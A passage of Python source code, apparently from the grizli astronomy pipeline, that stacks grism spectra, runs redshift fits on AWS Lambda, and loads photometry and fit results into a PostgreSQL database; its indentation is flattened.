norm_ix = np.interp(wnorm*(1+fresp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)
sel &= np.isfinite(norm_ix)
resp = fresp[sel]
norm_ix = np.cast[int](np.round(np.interp(wnorm*(1+resp['z_map']), wave, np.arange(len(wave)), left=np.nan, right=np.nan)))
resp.sort_values(sort_column, inplace=True)
if tablename == 'spec1d_g141':
exptime = resp['t_g141'].values
wlim = [1.1e4, 1.65e4]
else:
exptime = resp['t_g102'].values
wlim = [8000, 1.1e4, 1.65e4]
data = OrderedDict()
for c in resp.columns:
if c.startswith(tablename):
c_i = c.split(tablename+'_')[1]
try:
data[c_i] = np.array(resp[c].values.tolist())
except:
pass
#plt.imshow((data['flux'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
# Rest-frame
dz = np.diff(wave)[10]/wave[10]
max_zshift = np.cast[int](np.log(1+resp['z_map'].max())/dz)
zshift = np.cast[int]((np.log(1+resp['z_map']) - np.log(1+zref))/dz)
err_max = 5
# Continuum normalized
#norm = data['cont'][:,100]/data['flat'][:,100]
norm = np.zeros(len(resp))
for i, ix in enumerate(norm_ix):
norm[i] = data['line'][i, ix]/data['flat'][i, ix]
#norm = np.mean(data['cont'][:,50:120]/data['flat'][:,50:120], axis=1)
# 2D arrays
normed = ((data['flux']/data['flat']).T/norm).T
cnormed = ((data['cont']/data['flat']).T/norm).T
lnormed = (((data['line']-data['cont'])/data['flat']).T/norm).T
err = ((data['err']/data['flat']).T/norm).T
mask = np.isfinite(norm) & (norm > 0) & np.isfinite(norm_ix)
normed = normed[mask, :]
cnormed = cnormed[mask, :]
lnormed = lnormed[mask, :]
err = err[mask, :]
ivar = 1/err**2
ivar[err <= 0] = 0
# Weight by exposure time
ivar = (ivar.T*0+(exptime[mask]/4000.)*norm[mask]).T
zshift = zshift[mask]
# Clip edges
wclip = (wave > wlim[0]) & (wave < wlim[1])
mask_val = 1e10
normed[:, ~wclip] = -mask_val
cnormed[:, ~wclip] = -mask_val
lnormed[:, ~wclip] = -mask_val
sh = normed.shape
rest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
crest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
lrest = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min())) - mask_val
rest[:, zshift.max():zshift.max()+sh[1]] = normed*1
crest[:, zshift.max():zshift.max()+sh[1]] = cnormed*1
lrest[:, zshift.max():zshift.max()+sh[1]] = lnormed*1
rest_ivar = np.zeros((sh[0], sh[1]+zshift.max()-zshift.min()))
rest_ivar[:, zshift.max():zshift.max()+sh[1]] = ivar*1
for i in range(sh[0]):
rest[i, :] = np.roll(rest[i, :], -zshift[i])
crest[i, :] = np.roll(crest[i, :], -zshift[i])
lrest[i, :] = np.roll(lrest[i, :], -zshift[i])
rest_ivar[i, :] = np.roll(rest_ivar[i, :], -zshift[i])
ok = np.isfinite(rest) & np.isfinite(rest_ivar) & (rest > -0.8*mask_val)
rest_ivar[~ok] = 0
rest[~ok] = -mask_val
crest[~ok] = -mask_val
lrest[~ok] = -mask_val
shr = rest.shape
nbin = int((shr[0]//shr[1])//2*bin_factor)*2
kernel = np.ones((1, nbin)).T
# npix = np.maximum(nd.convolve((rest > -0.8*mask_val)*1, kernel), 1)
# srest = nd.convolve(rest*(rest > -0.8*mask_val), kernel)
# sbin = (srest/npix)[::nbin,:]
# plt.imshow(sbin, vmin=0, vmax=5)
num = nd.convolve(rest*rest_ivar, kernel)
cnum = nd.convolve(crest*rest_ivar, kernel)
lnum = nd.convolve(lrest*rest_ivar, kernel)
den = nd.convolve(rest_ivar, kernel)
wbin = (num/den)[::nbin, :]
wbin[~np.isfinite(wbin)] = 0
cwbin = (cnum/den)[::nbin, :]
cwbin[~np.isfinite(cwbin)] = 0
lwbin = (lnum/den)[::nbin, :]
lwbin[~np.isfinite(lwbin)] = 0
plt.imshow(wbin, vmin=0, vmax=5)
plt.imshow((data['line'] - data['cont'])/data['flat']/1.e-19, vmin=-0.1, vmax=10)
def run_lambda_fits(root='j004404m2034', phot_root=None, mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None, zr=[0.01, 3.4], bucket='grizli-v1', verbose=True, extra={'bad_pa_threshold': 10}, ids=None):
"""
Run redshift fits on lambda for a given root
"""
from grizli.aws import fit_redshift_lambda
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine()
import pandas as pd
import numpy as np
import glob
import os
print('Sync phot catalog')
if phot_root is None:
root = root
os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits"'.format(phot_root, bucket))
print('Sync wcs.fits')
os.system('aws s3 sync s3://{1}/Pipeline/{0}/Extractions/ ./ --exclude "*" --include "*_phot*.fits" --include "*wcs.fits"'.format(root, bucket))
phot = utils.read_catalog('{0}_phot_apcorr.fits'.format(phot_root))
phot['has_grism'] = 0
wcs_files = glob.glob('*wcs.fits')
for f in wcs_files:
w = utils.WCSFootprint(f, ext=0)
has = w.path.contains_points(np.array([phot['ra'], phot['dec']]).T)
print(f, has.sum())
phot['has_grism'] += has
mag = phot['mag_auto']*np.nan
mag_filt = np.array([' ']*len(phot))
sn = phot['mag_auto']*np.nan
for filt in ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f814w', 'f850lp', 'f606w', 'f775w']:
if '{0}_tot_1'.format(filt) in phot.colnames:
mag_i = 23.9-2.5*np.log10(phot['{0}_tot_1'.format(filt)])
fill = (~np.isfinite(mag)) & np.isfinite(mag_i)
mag[fill] = mag_i[fill]
mag_filt[fill] = filt
sn_i = phot['{0}_tot_1'.format(filt)]/phot['{0}_etot_1'.format(filt)]
sn[fill] = sn_i[fill]
sel = np.isfinite(mag) & (mag >= mag_limits[0]) & (mag <= mag_limits[1]) & (phot['has_grism'] > 0)
sel &= phot['flux_radius'] > 1
sel &= sn > sn_limit
if min_status is not None:
res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}'".format(root, min_status), engine)
if len(res) > 0:
status = phot['id']*0-100
status[res['id']-1] = res['status']
sel &= status < min_status
if ids is None:
ids = phot['id'][sel]
# Select just on min_status
if min_status > 1000:
if min_status > 10000:
# Include mag constraints
res = pd.read_sql_query("SELECT root, id, status, mtime, mag_auto FROM redshift_fit,photometry_apcorr WHERE root = '{0}' AND status = {1}/10000 AND mag_auto > {2} AND mag_auto < {3} AND p_root = root AND p_id = id".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
else:
# just select on status
res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}' AND status = {1}/1000".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
ids = res['id'].tolist()
if len(ids) == 0:
return False
fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name=bucket, skip_existing=False, sleep=False, skip_started=False, show_event=False, zr=zr, force_args=True, quasar_fit=False, output_path=None, save_figures='png', verbose=verbose, **extra)
print('Add photometry: {0}'.format(root))
grizli_db.add_phot_to_db(phot_root, delete=False, engine=engine)
res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
grizli_db.set_phot_root(root, phot_root, engine)
res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0 AND root = '{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
return res
if False:
res = pd.read_sql_query("SELECT root, id, status, redshift, bic_diff, mtime FROM redshift_fit WHERE (root = '{0}')".format(root), engine)
# Get arguments
args = fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 3.4], force_args=True)
def set_phot_root(root, phot_root, engine):
"""
"""
print(f'Set phot_root = {root} > {phot_root}')
SQL = f"""UPDATE redshift_fit
SET phot_root = '{phot_root}'
WHERE (root = '{root}');
"""
engine.execute(SQL)
if False:
# Check where phot_root not equal to root
res = pd.read_sql_query("SELECT root, id, status, phot_root FROM redshift_fit WHERE (phot_root != root)".format(root), engine)
# update the one pointing where it should change in photometry_apcorr
engine.execute("UPDATE photometry_apcorr SET p_root = 'j214224m4420' WHERE root = 'j214224m4420gr01';")
engine.execute("UPDATE redshift_fit SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
engine.execute("UPDATE redshift_fit_quasar SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
if False:
# Replace in-place
from grizli.aws import db as grizli_db
engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%' AND root LIKE '%%-grism%%")
engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%'")
engine.execute("update redshift_fit set phot_root = 'j214224m4420' WHERE root like 'j214224m4420gr%%'")
engine.execute("update redshift_fit_quasar set phot_root = replace(root, 'g800l', 'grism') where root like '%%g800l%%'")
# Set 3D-HST fields
res = grizli_db.from_sql("select distinct root from redshift_fit where root like '%%-grism%%'", engine)
for root in res['root']:
grizli_db.set_phot_root(root, root, engine)
grizli_db.set_phot_root(root.replace('-grism', '-g800l'), root, engine)
xres = grizli_db.from_sql("select root, count(root) from redshift_fit where root like '{0}-%%' group by root".format(root.split('-')[0]), engine)
print(xres)
# Update OBJID for natural join
# for tab in ['redshift_fit', 'redshift_fit_quasar', 'multibeam']
SQL = """
WITH sub AS (
SELECT objid as p_objid, p_root, p_id
FROM photometry_apcorr
)
UPDATE redshift_fit
SET objid = p_objid
FROM sub
WHERE phot_root = p_root AND id = p_id;
"""
grizli_db.from_sql(SQL, engine)
engine.execute(SQL)
def wait_on_db_update(root, t0=60, dt=30, n_iter=60, engine=None):
"""
Wait for db to stop updating on root
"""
import pandas as pd
from astropy.table import Table
from grizli.aws import db as grizli_db
import numpy as np
import time
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
n_i, n6_i, checksum_i = -1, -1, -1
for i in range(n_iter):
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}'".format(root), engine)
checksum = (2**res['status']).sum()
n = len(res)
n6 = (res['status'] == 6).sum()
n5 = (res['status'] == 5).sum()
if (n == n_i) & (checksum == checksum_i) & (n6 == n6_i):
break
now = utils.nowtime()
print('{0}, {1}: n={2:<5d} n5={5:<5d} n6={3:<5d} checksum={4}'.format(root, now, n, n6, checksum, n5))
n_i, n6_i, checksum_i = n, n6, checksum
if i == 0:
time.sleep(t0)
else:
time.sleep(dt)
return res
##
def fit_timeouts(root='j004404m2034', mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None):
"""
Run redshift fits on lambda for a given root
"""
from grizli.aws import fit_redshift_lambda
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = grizli_db.get_db_engine()
import pandas as pd
import numpy as np
import glob
import os
res = pd.read_sql_query("SELECT id, status FROM redshift_fit WHERE root = '{0}' AND status = 5".format(root), engine)
if len(res) == 0:
return True
ids = res['id'].tolist()
fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=False, zr=[0.01, 2.4], force_args=True)
res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
return res
# All timeouts
events = fit_redshift_lambda.fit_lambda(root='egs-g800l-j141956p5255', beams=[], ids=[20667], newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 2.4], force_args=True)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' ORDER BY root".format(root), engine)
base = {'bucket': 'grizli-v1', 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,2.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png'}
all_events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=True)
#################
# Fit locally on EC2
i0 = 0
import os
import pandas as pd
import numpy as np
from grizli.aws import db as grizli_db
from grizli.aws import fit_redshift_lambda, lambda_handler
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root LIKE '%%-grism%%' ORDER BY root", engine)
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root NOT LIKE '%%-grism%%' AND root NOT LIKE '%%g800l%%' ORDER BY root", engine)
bucket = 'grizli-v1'
res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'j114936p2222' ORDER BY id", engine)
bucket = 'grizli-v1'
# res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'cos-grism%%' order by id", engine)
# bucket = 'grizli-cosmos-v2'
N = len(res)
np.random.seed(1)
so = np.argsort(np.random.normal(size=N))
base = {'bucket': bucket, 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,3.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png', 'verbose': True, 'working_directory': os.getcwd()}
events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=False)
for event in events[i0::2]:
lambda_handler.handler(event, {})
########
xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
print(len(res), len(xres))
# show points
xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
# Photometry table
def set_filter_bits(phot):
"""
Set bits indicating available filters
"""
import numpy as np
filters = ['f160w', 'f140w', 'f125w', 'f110w', 'f105w', 'f098m', 'f850lp', 'f814w', 'f775w', 'f625w', 'f606w', 'f475w', 'f438w', 'f435w', 'f555w', 'f350lp', 'f390w', 'f336w', 'f275w', 'f225w']
bits = [np.uint32(2**i) for i in range(len(filters))]
phot['filter_bit'] = np.zeros(len(phot), dtype=np.uint32)
phot['red_bit'] = np.zeros(len(phot), dtype=np.uint32)
for i, filt in enumerate(filters):
col = '{0}_flux_aper_0'.format(filt)
if col in phot.colnames:
red = bits[i] * np.isfinite(phot[col]) * (phot['filter_bit'] == 0)
phot['filter_bit'] |= bits[i] * np.isfinite(phot[col])
phot['red_bit'] |= red
print(filt, i, bits[i], red.max())
def phot_to_dataframe(phot, root):
"""
Convert phot_apcorr.fits table to a pandas DataFrame
- Add 'root' column
- remove "dummy" columns
- rename 'xmin', 'xmax', 'ymin', 'ymax' to 'image_xmin', ...
"""
phot['root'] = root
set_filter_bits(phot)
for c in ['dummy_flux', 'dummy_err']:
if c in phot.colnames:
phot.remove_column(c)
for c in ['xmin', 'xmax', 'ymin', 'ymax']:
phot.rename_column(c, 'image_'+c)
for c in ['root', 'id', 'ra', 'dec']:
phot.rename_column(c, 'p_'+c)
df = phot.to_pandas()
return df
def add_phot_to_db(root, delete=False, engine=None, nmax=500):
"""
Read the table {root}_phot_apcorr.fits and append it to the grizli_db `photometry_apcorr` table
"""
import pandas as pd
from astropy.table import Table
from grizli.aws import db as grizli_db
import numpy as np
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("SELECT p_root, p_id FROM photometry_apcorr WHERE p_root = '{0}'".format(root), engine)
if len(res) > 0:
if delete:
print('Delete rows where root={0}'.format(root))
res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root))
if False:
res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root))
else:
print('Data found for root={0}, delete them if necessary'.format(root))
return False
# Read the catalog
phot = Table.read('{0}_phot_apcorr.fits'.format(root), character_as_bytes=False)
# remove columns
remove = []
for c in phot.colnames:
if ('_corr_' in c) | ('_ecorr_' in c) | (c[-5:] in ['tot_4', 'tot_5', 'tot_6']) | ('dummy' in c):
remove.append(c)
phot.remove_columns(remove)
# Add new filter columns if necessary
empty = pd.read_sql_query("SELECT * FROM photometry_apcorr WHERE false", engine)
df = phot_to_dataframe(phot, root)
new_cols = []
for c in df.columns:
if c not in empty.columns:
new_cols.append(c)
if len(new_cols) > 0:
for c in new_cols:
print('Add column {0} to `photometry_apcorr` table'.format(c))
sql = "ALTER TABLE photometry_apcorr ADD COLUMN {0} real;".format(c)
res = engine.execute(sql)
# Add new table
print('Send {0}_phot_apcorr.fits to `photometry_apcorr`.'.format(root))
if nmax > 0:
# Split
N = len(phot) // nmax
for i in range(N+1):
print(' add rows {0:>5}-{1:>5} ({2}/{3})'.format(i*nmax, (i+1)*nmax, i+1, N+1))
df[i*nmax:(i+1)*nmax].to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
else:
df.to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
def multibeam_to_database(beams_file, engine=None, Rspline=15, force=False, **kwargs):
"""
Send statistics of the beams.fits file to the database
"""
import numpy as np
import pandas as pd
from astropy.time import Time
from .. import multifit, utils
if engine is None:
engine = get_db_engine(echo=False)
mtime = Time(os.stat(beams_file).st_mtime, format='unix').iso
root = beams_file.split('_')[0]
id = int(beams_file.split('_')[1].split('.')[0])
res = pd.read_sql_query("SELECT mtime from multibeam WHERE (root = '{0}' AND id = {1})".format(root, id), engine)
if len(res) == 1:
if (res['mtime'][0] == mtime) & (not force):
print('{0} already in multibeam table'.format(beams_file))
return True
mb = multifit.MultiBeam(beams_file, **kwargs)
print('Update `multibeam` and `beam_geometry` tables for {0}.'.format(beams_file))
# Dummy for loading the templates the same way as for the quasars
# for generating the spline fit
templ_args = {'uv_line_complex': True,
'broad_fwhm': 2800,
'narrow_fwhm': 1000,
'fixed_narrow_lines': True,
'Rspline': Rspline,
'include_reddened_balmer_lines': False}
q0, q1 = utils.load_quasar_templates(**templ_args)
for t in list(q0.keys()):
if 'bspl' not in t:
q0.pop(t)
tfit = mb.template_at_z(0, templates=q0, fitter='lstsq')
sp = tfit['line1d'].wave, tfit['line1d'].flux
m2d = mb.get_flat_model(sp, apply_mask=True, is_cgs=True)
mb.initialize_masked_arrays()
chi0 = (mb.scif_mask**2*mb.ivarf[mb.fit_mask]).sum()
# Percentiles of masked contam, sci, err and contam/sci
pvals = np.arange(5, 96, 5)
mpos = m2d > 0
contam_percentiles = np.percentile(mb.contamf_mask, pvals)
sci_percentiles = np.percentile(mb.scif_mask, pvals)
err_percentiles = np.percentile(1/mb.sivarf[mb.fit_mask], pvals)
sn_percentiles = np.percentile(mb.scif_mask*mb.sivarf[mb.fit_mask], pvals)
fcontam_percentiles = np.percentile(mb.contamf_mask/mb.scif_mask, pvals)
# multibeam dataframe
df = pd.DataFrame()
float_type = np.float
df['root'] = [root]
df['id'] = [id]
df['objid'] = [-1]
df['mtime'] = [mtime]
df['status'] = [6]
df['scip'] = [list(sci_percentiles.astype(float_type))]
df['errp'] = [list(err_percentiles.astype(float_type))]
df['snp'] = [list(sn_percentiles.astype(float_type))]
df['snmax'] = [float_type((mb.scif_mask*mb.sivarf[mb.fit_mask]).max())]
df['contamp'] = [list(contam_percentiles.astype(float_type))]
df['fcontamp'] = [list(fcontam_percentiles.astype(float_type))]
df['chi0'] = [np.int32(chi0)]
df['rspline'] = [Rspline]
df['chispl'] = [np.int32(tfit['chi2'])]
df['mb_dof'] = [mb.DoF]
df['wmin'] = [np.int32(mb.wave_mask.min())]
df['wmax'] = [np.int32(mb.wave_mask.max())]
# Input args
for a in ['fcontam', 'sys_err', 'min_sens', 'min_mask']:
df[a] = [getattr(mb, a)]
# Send to DB
res = engine.execute("DELETE from multibeam WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
df.to_sql('multibeam', engine, index=False, if_exists='append', method='multi')
# beams dataframe
d = {}
for k in ['root', 'id', 'objid', 'filter', 'pupil', 'pa', 'instrument', 'fwcpos', 'order', 'parent', 'parent_ext', 'ccdchip', 'sci_extn', 'exptime', 'origin_x', 'origin_y', 'pad', 'nx', 'ny', 'sregion']:
d[k] = []
for beam in mb.beams:
d['root'].append(root)
d['id'].append(id)
d['objid'].append(-1)
for a in ['filter', 'pupil', 'instrument', 'pad',
'fwcpos', 'ccdchip', 'sci_extn', 'exptime']:
d[a].append(getattr(beam.grism, a))
d['order'].append(beam.beam.beam)
parent = beam.grism.parent_file.replace('.fits', '').split('_')
d['parent'].append(parent[0])
d['parent_ext'].append(parent[1])
d['origin_x'].append(beam.grism.origin[1])
d['origin_y'].append(beam.grism.origin[0])
d['nx'].append(beam.sh[1])
d['ny'].append(beam.sh[0])
f = beam.grism.wcs.calc_footprint().flatten()
fs = ','.join(['{0:.6f}'.format(c) for c in f])
d['sregion'].append('POLYGON({0})'.format(fs))
d['pa'].append(int(np.round(beam.get_dispersion_PA())))
df = pd.DataFrame.from_dict(d)
# Send to database
res = engine.execute("DELETE from beam_geometry WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
df.to_sql('beam_geometry', engine, index=False, if_exists='append', method='multi')
if False:
# Fix multibeam arrays
import pandas as pd
import numpy as np
from sqlalchemy import types
from grizli.aws import db as grizli_db
engine = grizli_db.get_db_engine()
df = pd.read_sql_query('select id, root, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
c = 'snp'
data = pd.DataFrame()
data['id'] = df['id']
data['root'] = df['root']
dtype = {'root': types.String, 'id': types.Integer}
for c in df.columns:
if c.endswith('p'):
print(c)
dtype[c[:-1]+'_p'] = types.ARRAY(types.FLOAT)
data[c[:-1]+'_p'] = [list(np.cast[float](line.strip()[1:-1].split(','))) for line in df[c]]
data.to_sql('multibeam_tmp', engine, index=False, if_exists='append', method='multi')
from sqlalchemy import types
for c in df.columns:
if c.endswith('p'):
pass
for c in df.columns:
if c.endswith('p'):
sql = "ALTER TABLE multibeam ADD COLUMN {0} real[];".format(c[:-1]+'_p')
print(sql)
sql = "UPDATE multibeam mb SET {new} = tmp.{new} FROM multibeam_tmp tmp WHERE tmp.id = mb.id AND tmp.root = mb.root;".format(new=c[:-1]+'_p')
print(sql)
x = grizli_db.from_sql('select id, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
def test_join():
import pandas as pd
res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)
res = pd.read_sql_query("SELECT * FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)
# on root
root = 'xxx'
res = pd.read_sql_query("SELECT p.root, p.id, mag_auto, z_map, status FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE root='{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
def column_comments():
from collections import OrderedDict
import yaml
tablename = 'redshift_fit'
cols = pd.read_sql_query('select * from {0} where false'.format(tablename), engine)
d = {} # OrderedDict{}
for c in cols.columns:
d[c] = '---'
if not os.path.exists('{0}_comments.yml'.format(tablename)):
print('Init {0}_comments.yml'.format(tablename))
fp = open('{0}_comments.yml'.format(tablename), 'w')
yaml.dump(d, stream=fp, default_flow_style=False)
fp.close()
# Edit file
comments = yaml.load(open('{0}_comments.yml'.format(tablename)))
SQL = ""
upd = "COMMENT ON COLUMN {0}.{1} IS '{2}';\n"
for col in comments:
if comments[col] != '---':
SQL += upd.format(tablename, col, comments[col])
else:
print('Skip ', col)
def add_spectroscopic_redshifts(xtab, rmatch=1, engine=None, db=None):
"""
Add spectroscopic redshifts to the photometry_apcorr table
Input table needs (at least) columns:
['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']
"""
import glob
import pandas as pd
from astropy.table import vstack
from grizli.aws import db as grizli_db
from grizli import utils
for c in ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']:
if c not in xtab.colnames:
print('Column {0} not found in input table'.format(c))
return False
if engine is None:
engine = grizli_db.get_db_engine(echo=False)
# Force data types
tab = xtab[xtab['z_spec'] >= 0]
if hasattr(tab['ra'], 'mask'):
tab = tab[~tab['ra'].mask]
tab['z_spec_qual'] = tab['z_spec_qual']*1
tab['z_spec_qual_raw'] = tab['z_spec_qual_raw']*1
if False:
# duplicates
fit = grizli_db.from_sql("select root, ra, dec from redshift_fit", engine)
fit = grizli_db.from_sql("select root, ra, dec from redshift_fit where ra is null", engine)
# Select master table
if db is None:
res = pd.read_sql_query("SELECT p_root, p_id, p_ra, p_dec, z_spec from photometry_apcorr", engine)
db = utils.GTable.from_pandas(res)
for c in ['p_root', 'p_id', 'p_ra', 'p_dec']:
db.rename_column(c, c[2:])
idx, dr = db.match_to_catalog_sky(tab)
hasm = (dr.value < rmatch) & (tab['z_spec'] >= 0)
tab['z_spec_dr'] = dr.value
tab['z_spec_ra'] = tab['ra']
tab['z_spec_dec'] = tab['dec']
tab['db_root'] = db['root'][idx]
tab['db_id'] = db['id'][idx]
tabm = tab[hasm]['db_root', 'db_id', 'z_spec', 'z_spec_src', 'z_spec_dr', 'z_spec_ra', 'z_spec_dec', 'z_spec_qual_raw', 'z_spec_qual']
print('Send zspec to photometry_apcorr (N={0})'.format(hasm.sum()))
df = tabm.to_pandas()
df.to_sql('z_spec_tmp', engine, index=False, if_exists='replace', method='multi')
SQL = """UPDATE photometry_apcorr
SET z_spec = zt.z_spec,
z_spec_src = zt.z_spec_src,
z_spec_dr = zt.z_spec_dr,
z_spec_ra = zt.z_spec_ra,
z_spec_dec = zt.z_spec_dec,
z_spec_qual_raw = zt.z_spec_qual_raw,
z_spec_qual = zt.z_spec_qual
FROM z_spec_tmp as zt
WHERE (zt.db_root = p_root AND zt.db_id = p_id);
"""
engine.execute(SQL)
if False:
# Update redshift_fit ra/dec with photometry_table double prec.
SQL = """UPDATE redshift_fit
SET ra = p_ra
dec = p_dec
FROM photometry_apcorr
WHERE (phot_root = p_root AND id = p_id AND root = 'j123556p6221');
"""
def mtime_to_iso(ct):
"""
Convert mtime values to ISO format suitable for sorting, etc.
"""
months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
spl = ct.split()
iso = '{yr}-{mo:02d}-{dy:02d} {time}'.format(dy=int(spl[2]), mo=int(months.index(spl[1])+1), yr=spl[-1], time=spl[-2])
return iso
def various_selections():
from grizli.aws import db as grizli_db
# sdss z_spec
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^sdss-dr15'", table_root='sdss_zspec', sync='s3://grizli-v1/tables/')
# objects with carla redshifts (radio loud)
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^carla'", table_root='carla_zspec', sync='s3://grizli-v1/tables/')
# Bright galaxies with q_z flag
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND mag_auto < 22 AND z_map > 1.3", table_root='bright', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# High-z compiliation
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'q_z', 'h_zphot', 'h_src', 'h_dr'], where="AND status > 4 AND phot_root = h_root AND id = h_id AND h_dr < 1", tables=['highz_2015'], table_root='highz', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# z_spec with dz
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1", table_root='zspec_delta', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# Point sources
